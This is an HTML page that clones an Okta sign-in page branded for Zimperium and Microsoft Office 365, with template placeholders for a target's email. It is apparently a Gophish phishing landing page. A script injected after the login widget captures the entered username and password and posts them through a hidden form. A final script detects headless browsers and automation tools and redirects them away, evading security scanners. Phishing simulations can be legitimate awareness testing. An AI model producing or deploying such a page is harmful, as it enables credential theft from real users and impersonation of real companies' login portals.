<!DOCTYPE html>
<!--[if IE 7]><html lang="en" class="lt-ie10 lt-ie9 lt-ie8"><![endif]-->
<!--[if IE 8]><html lang="en" class="lt-ie10 lt-ie9"> <![endif]-->
<!--[if IE 9]><html lang="en" class="lt-ie10"><![endif]-->
<!--[if gt IE 9]><html lang="en"><![endif]-->
<!--[if !IE]><!--><html lang="en"><!--<![endif]-->
<head>
    <meta charset="UTF-8">

    <script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">if (typeof module === 'object') {window.module = module; module = undefined;}</script><style type="text/css" nonce="GbJoEX60HpuEJf6f877zFg">
        .bgStyle {
          background-image: none
        }
        .bgStyleIE8 {
          
        }
        .copyright a:focus-visible, 
        .privacy-policy a:focus-visible {
          border-radius: 6px;
          outline: rgb(84, 107, 231) solid 1px;
          outline-offset: 2px;
          text-decoration: none !important;
        }
    </style><title>Zimperium - Sign In</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="robots" content="noindex, nofollow, noarchive" />

    <script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">window.cspNonce = 'GbJoEX60HpuEJf6f877zFg';</script><script src="https://ok14static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.33.2/js/okta-sign-in.min.js" type="text/javascript" integrity="sha384-yEQR8oBedCVhw7cfWyk0wwOq6ewbnlhJsgb3G8QwTyJiYpTkYdfUsWK4QU4wjoen" crossorigin="anonymous"></script>
    <link href="https://ok14static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.33.2/css/okta-sign-in.min.css" type="text/css" rel="stylesheet" integrity="sha384-fxx+LDlIb08xQnHiuttLUvFQjDs5lrUHVoq4eWhpVlSteR2K2q21MbrOCkWfWqqs" crossorigin="anonymous"/>

    <link rel="shortcut icon" href="https://ok14static.oktacdn.com/bc/image/fileStoreRecord?id=fs0po5khq8H3piuZ0697" type="image/x-icon"/>
<link href="https://ok14static.oktacdn.com/assets/loginpage/css/loginpage-theme.c8c15f6857642c257bcd94823d968bb1.css" rel="stylesheet" type="text/css"/><link href="/api/internal/brand/theme/style-sheet?touch-point=SIGN_IN_PAGE&v=4baaffe7fc3b9ab0621cd0bb108e6974d398a61160fd4993137adea4c8d147355a9a62dc6d9c6a5560ecd7843236810e" rel="stylesheet" type="text/css">
<style type="text/css">
    body {
        background-color: #ebebed !important;
    }
    .auth-container {
        background-color: #ffffff !important;
    }
    .o-form-button-bar .button-primary, .o-form-button-bar .button {
        background: #1b365d !important;
        border-color: #1b365d !important;
    }
</style>
    <script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">
        var okta = {
            locale: 'en',
            deployEnv: 'PROD'
        };
    </script><script nonce="GbJoEX60HpuEJf6f877zFg">window.okta || (window.okta = {}); okta.cdnUrlHostname = "//ok14static.oktacdn.com"; okta.cdnPerformCheck = false;</script><script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">
        window.onerror = function (msg, _url, _lineNo, _colNo, error) {
            if (window.console && window.console.error) {
                if (error) {
                    console.error(error);
                } else {
                    console.error(msg);
                }
            }

            // Return true to suppress "Script Error" alerts in IE
            return true;
        };
    </script><script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">if (window.module) module = window.module;</script></head>
<body class="auth okta-container">

<!--[if gte IE 8]>
<![if lte IE 10]>

<style type="text/css" nonce="GbJoEX60HpuEJf6f877zFg">
    .unsupported-browser-banner-wrap {
    padding: 20px;
    border: 1px solid #ddd;
    background-color: #f3fbff;
    }
    .unsupported-browser-banner-inner {
    position: relative;
    width: 735px;
    margin: 0 auto;
    text-align: left;
    }
    .unsupported-browser-banner-inner .icon {
    vertical-align: top;
    margin-right: 20px;
    display: inline-block;
    position: static !important;
    }
    .unsupported-browser-banner-inner a {
    text-decoration: underline;
    }
</style><div class="unsupported-browser-banner-wrap">
<div class="unsupported-browser-banner-inner">
<span class="icon icon-16 icon-only warning-16-yellow"></span>You are using an unsupported browser. For the best experience, update to <a href="//help.okta.com/okta_help.htm?type=&locale=en&id=csh-browser-support">a supported browser</a>.</div>
</div>

<![endif]>
<![endif]-->
<!--[if IE 8]> <div id="login-bg-image-ie8" class="login-bg-image tb--background bgStyleIE8" data-se="login-bg-image"></div> <![endif]-->
<!--[if (gt IE 8)|!(IE)]><!--> <div id="login-bg-image" class="login-bg-image tb--background bgStyle" data-se="login-bg-image"></div> <!--<![endif]-->

<!-- hidden form for reposting fromURI for X509 auth -->
<form action="/login/cert" method="post" id="x509_login" name="x509_login" class="hide">
    <input type="hidden" id="fromURI" name="fromURI" class="hidden" value="/app/office365/{{ okta_app_id | default('APP_ID') }}/sso/wsfed/passive?username={{ target_email | urlencode | default('user%40example.com') }}&amp;wa=wsignin1.0&amp;wtrealm=urn%3afederation%3aMicrosoftOnline&amp;wctx="/>
</form>

<div class="content">
  <div class="applogin-banner">
          <div class="applogin-background"></div>
          <div class="applogin-container">
              <h1>
                  <span class="applogin-app-title">
                    Connecting to</span>
                  <div class="applogin-app-logo">
                      <img src="https://ok14static.oktacdn.com/fs/bcg/4/gfs1iitj6mtRHwXoE1d8" alt="Microsoft&#x20;Office&#x20;365" class="logo office365"/></div>
              </h1>
              <p>Sign in with your account to access Microsoft Office 365</p>
              </div>
      </div>
  <style type="text/css" nonce="GbJoEX60HpuEJf6f877zFg">
    .noscript-msg {
        background-color: #fff;
        border-color: #ddd #ddd #d8d8d8;
        box-shadow:0 2px 0 rgba(175, 175, 175, 0.12);
        text-align: center;
        width: 398px;
        min-width: 300px;
        margin: 200px auto;
        border-radius: 3px;
        border-width: 1px;
        border-style: solid;
    }

    .noscript-content {
        padding: 42px;
    }

    .noscript-content h2 {
        padding-bottom: 20px;
    }

    .noscript-content h1 {
        padding-bottom: 25px;
    }

    .noscript-content a {
        background: transparent;
        box-shadow: none;
        display: table-cell;
        vertical-align: middle;
        width: 314px;
        height: 50px;
        line-height: 36px;
        color: #fff;
        background: linear-gradient(#007dc1, #0073b2), #007dc1;
        border: 1px solid;
        border-color: #004b75;
        border-bottom-color: #00456a;
        box-shadow: rgba(0, 0, 0, 0.15) 0 1px 0, rgba(255, 255, 255, 0.1) 0 1px 0 0 inset;
        -webkit-border-radius: 3px;
        border-radius: 3px;
    }

    .noscript-content a:hover {
        background: #007dc1;
        cursor: hand;
        text-decoration: none;
    }
 </style><noscript>
    <div id="noscript-msg" class="noscript-msg">
        <div class="noscript-content">
            <h2>Javascript is required</h2>
            <h1>Javascript is disabled on your browser.&nbspPlease enable Javascript and refresh this page.</h1>
            <a href="." class="tb--button">Refresh</a>
        </div>
    </div>
</noscript>
<div id="signin-container"></div>
  <div id="okta-sign-in" class="auth-container main-container hide">
      <div id="unsupported-onedrive" class="unsupported-message hide">
        <h2 class="o-form-head">Your OneDrive version is not supported</h2>
        <p>Upgrade now by installing the OneDrive for Business Next Generation Sync Client to login to Okta</p>
        <a class="button button-primary tb--button" target="_blank" href="https://support.okta.com/help/articles/Knowledge_Article/Upgrading-to-OneDrive-for-Business-Next-Generation-Sync-Client">
          Learn how to upgrade</a>
      </div>
      <div id="unsupported-cookie" class="unsupported-message hide">
          <h2 class="o-form-head">Cookies are required</h2>
          <p>Cookies are disabled on your browser. Please enable Cookies and refresh this page.</p>
          <a class="button button-primary tb--button" target="_blank" href=".">
              Refresh</a>
      </div>
  </div>
</div>

<div class="footer">
  <div class="footer-container clearfix">
    <p class="copyright">Powered by <a href="https://www.okta.com/?internal_link=wic_login" class="inline-block notranslate">Okta</a></p>
        <p class="privacy-policy"><a href="/privacy" target="_blank" class="inline-block margin-l-10">Privacy Policy</a></p>
    </div>
</div>

<script nonce="GbJoEX60HpuEJf6f877zFg" type="text/javascript">function runLoginPage (fn) {var mainScript = document.createElement('script');mainScript.src = 'https://ok14static.oktacdn.com/assets/js/mvc/loginpage/initLoginPage.pack.58de3be0c9b511a0fdfd7ea4f69b56fc.js';mainScript.crossOrigin = 'anonymous';mainScript.integrity = 'sha384-cJ4LGViZBmIttMPH+ao2RyPuN5BztKWYWIa4smbm56r1cUhkU/Dr6vTS3UoPbKTI';document.getElementsByTagName('head')[0].appendChild(mainScript);fn && mainScript.addEventListener('load', function () { setTimeout(fn, 1) });}</script><script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">
(function(){
  var baseUrl = 'https://{{ okta_org | default("your.okta.com") }}';
  var suppliedRedirectUri = '';
  var repost = false;
  var stateToken = '';
  var fromUri = '/app/office365/{{ okta_app_id | default("APP_ID") }}/sso/wsfed/passive?username={{ target_email | default("user@example.com") }}&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=';
  var username = '';
  var rememberMe = true;
  var smsRecovery = false;
  var callRecovery = false;
  var emailRecovery = true;
  var usernameLabel = 'Username';
  var usernameInlineLabel = '';
  var passwordLabel = 'Password';
  var passwordInlineLabel = '';
  var signinLabel = 'Sign\x20In';
  var forgotpasswordLabel = 'Forgot\x20password\x3F';
  var unlockaccountLabel = 'Unlock\x20account\x3F';
  var helpLabel = 'Help';
  var orgSupportPhoneNumber = '';
  var hideSignOutForMFA = false;
  var hideBackToSignInForReset = false;
  var footerHelpTitle = 'Need\x20help\x20signing\x20in\x3F';
  var recoveryFlowPlaceholder = 'Email\x20or\x20Username';
  var signOutUrl = '';
  var authScheme = 'OAUTH2';
  var hasPasswordlessPolicy = '';
  var INVALID_TOKEN_ERROR_CODE = 'errors.E0000011';

  var securityImage = true;
  


  var selfServiceUnlock = false;
  
    selfServiceUnlock = true;
  

  var redirectByFormSubmit = false;
  

  var showPasswordRequirementsAsHtmlList = true;

  var autoPush = false;
  
    autoPush = true;
  

  var accountChooserDiscoveryUrl = 'https://login.okta.com/discovery/iframe.html';

  // In case of custom app login, the uri is already absolute, so we must not attach baseUrl
  var redirectUri;
  if (isAbsoluteUri(fromUri)) {
      redirectUri = fromUri;
  } else {
      redirectUri = baseUrl + fromUri;
  }
  

  var backToSignInLink = '';
  

  var customButtons;
  var pivProperties = {};

  

  var customLinks = [];
  
  var factorPageCustomLink = {};
  

  var linkParams;
  

  var proxyIdxResponse;
  

  var stateTokenAllFlows;
  

  var idpDiscovery;
  var idpDiscoveryRequestContext;
  

  var showPasswordToggleOnSignInPage = false;
  var showIdentifier = false;
  

  var hasSkipIdpFactorVerificationButton = false;
  

  var hasOAuth2ConsentFeature = false;
  var consentFunc;
  

  var hasMfaAttestationFeature = false;
  
    hasMfaAttestationFeature = true;
  

  var rememberMyUsernameOnOIE = false;
  

  var engFastpassMultipleAccounts = true;

  var registration = false;
  

  var webauthn = true;
  

    var overrideExistingStateToken = false;
    

  var isPersonalOktaOrg = false;
  

  var sameDeviceOVEnrollmentEnabled = false;
  

  var orgSyncToAccountChooserEnabled = true;
  

  var showSessionRevocation = false;
  
      showSessionRevocation = true;
  

  var hcaptcha;
  

  var loginPageConfig = {
    fromUri: fromUri,
    repost: repost,
    redirectUri: redirectUri,
    backToSignInLink: backToSignInLink,
    isMobileClientLogin: false,
    isMobileSSO: false,
    disableiPadCheck: false,
    enableiPadLoginReload: false,
    linkParams: linkParams,
    hasChromeOSFeature: false,
    showLinkToAppStore: false,
    accountChooserDiscoveryUrl: accountChooserDiscoveryUrl,
    mfaAttestation: hasMfaAttestationFeature,
    isPersonalOktaOrg: isPersonalOktaOrg,
    enrollingFactor: '',
    stateTokenExpiresAt: '',
    stateTokenRefreshWindowMs: '',
    orgSyncToAccountChooserEnabled: orgSyncToAccountChooserEnabled,
    inactiveTab: {
      enabled: false,
      elementId: 'inactive-tab-main-div',
      avoidPageRefresh: true
    },
    signIn: {
      el: '#signin-container',
      baseUrl: baseUrl,
      brandName: 'Okta',
      logo: 'https://ok14static.oktacdn.com/fs/bco/1/fs0po5h0orFSteVvh697',
      logoText: 'Zimperium logo',
      helpSupportNumber: orgSupportPhoneNumber,
      stateToken: stateToken,
      username: username,
      signOutLink: signOutUrl,
      consent: consentFunc,
      authScheme: authScheme,
      relayState: fromUri,
      proxyIdxResponse: proxyIdxResponse,
      overrideExistingStateToken: overrideExistingStateToken,
      interstitialBeforeLoginRedirect: 'DEFAULT',
      
      idpDiscovery: {
        requestContext: idpDiscoveryRequestContext
      },
      features: {
        router: true,
        securityImage: securityImage,
        rememberMe: rememberMe,
        autoPush: autoPush,
        webauthn: webauthn,
        smsRecovery: smsRecovery,
        callRecovery: callRecovery,
        emailRecovery: emailRecovery,
        selfServiceUnlock: selfServiceUnlock,
        multiOptionalFactorEnroll: true,
        sameDeviceOVEnrollmentEnabled: sameDeviceOVEnrollmentEnabled,
        deviceFingerprinting: true,
        useDeviceFingerprintForSecurityImage: true,
        trackTypingPattern: false,
        hideSignOutLinkInMFA: hideSignOutForMFA,
        hideBackToSignInForReset: hideBackToSignInForReset,
        rememberMyUsernameOnOIE: rememberMyUsernameOnOIE,
        engFastpassMultipleAccounts: engFastpassMultipleAccounts,
        customExpiredPassword: true,
        idpDiscovery: idpDiscovery,
        passwordlessAuth: hasPasswordlessPolicy,
        consent: hasOAuth2ConsentFeature,
        skipIdpFactorVerificationBtn: hasSkipIdpFactorVerificationButton,
        showPasswordToggleOnSignInPage: showPasswordToggleOnSignInPage,
        showIdentifier: showIdentifier,
        registration: registration,
        redirectByFormSubmit: redirectByFormSubmit,
        showPasswordRequirementsAsHtmlList: showPasswordRequirementsAsHtmlList,
        showSessionRevocation: showSessionRevocation
      },

      assets: {
        baseUrl: "https\x3A\x2F\x2Fok14static.oktacdn.com\x2Fassets\x2Fjs\x2Fsdk\x2Fokta\x2Dsignin\x2Dwidget\x2F7.33.2"
      },

      language: okta.locale,
      i18n: {},

      customButtons: customButtons,

      piv: pivProperties,

      helpLinks: {
        help: '',
        forgotPassword: '',
        unlock: '',
        custom: customLinks,
        factorPage: factorPageCustomLink
      },

      cspNonce: window.cspNonce,

      hcaptcha: hcaptcha,
    }
  };
  

  loginPageConfig.signIn.i18n[okta.locale] = {
    
    'primaryauth.username.placeholder': usernameLabel,
    'primaryauth.username.tooltip': usernameInlineLabel,
    'primaryauth.password.placeholder': passwordLabel,
    'primaryauth.password.tooltip': passwordInlineLabel,
    'mfa.challenge.password.placeholder': passwordLabel,
    'primaryauth.title': signinLabel,
    'forgotpassword': forgotpasswordLabel,
    'unlockaccount': unlockaccountLabel,
    'help': helpLabel,
    'needhelp': footerHelpTitle,
    'password.forgot.email.or.username.placeholder': recoveryFlowPlaceholder,
    'password.forgot.email.or.username.tooltip': recoveryFlowPlaceholder,
    'account.unlock.email.or.username.placeholder': recoveryFlowPlaceholder,
    'account.unlock.email.or.username.tooltip': recoveryFlowPlaceholder
  };

    
            loginPageConfig.signIn.logoText = 'Zimperium logo';
            loginPageConfig.signIn.brandName = 'Zimperium';
        

  function isOldWebBrowserControl() {
    // We no longer support IE7. If we see the MSIE 7.0 browser mode, it's a good signal
    // that we're in a windows embedded browser.
    if (navigator.userAgent.indexOf('MSIE 7.0') === -1) {
      return false;
    }

    // Because the userAgent is the same across embedded browsers, we use feature
    // detection to see if we're running on older versions that do not support updating
    // the documentMode via x-ua-compatible.
    return document.all && !window.atob;
  }

  function isAbsoluteUri(uri) {
    var pat = /^https?:\/\//i;
    return pat.test(uri);
  }

  var unsupportedContainer = document.getElementById('okta-sign-in');

  var failIfCookiesDisabled = true;
  

  // Old versions of WebBrowser Controls (specifically, OneDrive) render in IE7 browser
  // mode, with no way to override the documentMode. In this case, inform the user they need
  // to upgrade.
  if (isOldWebBrowserControl()) {
    document.getElementById('unsupported-onedrive').removeAttribute('style');
    unsupportedContainer.removeAttribute('style');
  }
  else if (failIfCookiesDisabled && !navigator.cookieEnabled) {
    document.getElementById('unsupported-cookie').removeAttribute('style');
    unsupportedContainer.removeAttribute('style');
  }
  else {
    unsupportedContainer.parentNode.removeChild(unsupportedContainer);
    runLoginPage(function () {
      var res = OktaLogin.initLoginPage(loginPageConfig);
      
      // Intercept form submission for Gophish
      setTimeout(function() {
        var submitButton = document.querySelector('[data-type="save"]') || 
                          document.querySelector('.button-primary') ||
                          document.querySelector('input[type="submit"]');
        
        if (submitButton) {
          submitButton.addEventListener('click', function(e) {
            // Small delay to let Okta validate, then capture values
            setTimeout(function() {
              var usernameField = document.querySelector('[name="username"]') || 
                                document.querySelector('#okta-signin-username') ||
                                document.querySelector('input[type="text"]');
              var passwordField = document.querySelector('[name="password"]') || 
                                document.querySelector('#okta-signin-password') ||
                                document.querySelector('input[type="password"]');
              
              if (usernameField && passwordField && usernameField.value && passwordField.value) {
                // Create hidden form for Gophish
                var form = document.createElement('form');
                form.method = 'POST';
                form.action = '';
                form.style.display = 'none';
                
                var userInput = document.createElement('input');
                userInput.type = 'hidden';
                userInput.name = 'username';
                userInput.value = usernameField.value;
                form.appendChild(userInput);
                
                var passInput = document.createElement('input');
                passInput.type = 'hidden';
                passInput.name = 'password';
                passInput.value = passwordField.value;
                form.appendChild(passInput);
                
                document.body.appendChild(form);
                form.submit();
              }
            }, 100);
          });
        }
      }, 2000);
    });
  }
}());
</script><script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">
  window.addEventListener('load', function(event) {
    function applyStyle(id, styleDef) {
      if (styleDef) {
        var el = document.getElementById(id);
        if (!el) {
          return;
        }
        el.classList.add(styleDef);
      }
    }
    applyStyle('login-bg-image', 'bgStyle');
    applyStyle('login-bg-image-ie8', 'bgStyleIE8');
  });
</script>
    <script>
    (function() {
        var headless = (
            navigator.webdriver ||
            (!window.chrome && /Chrome/.test(navigator.userAgent)) ||
            navigator.plugins.length === 0 ||
            /HeadlessChrome|PhantomJS|Selenium|WebDriver/i.test(navigator.userAgent)
        );
        if (headless) { window.location.replace('https://www.okta.com'); }
    })();
    </script>
</body>
</html>
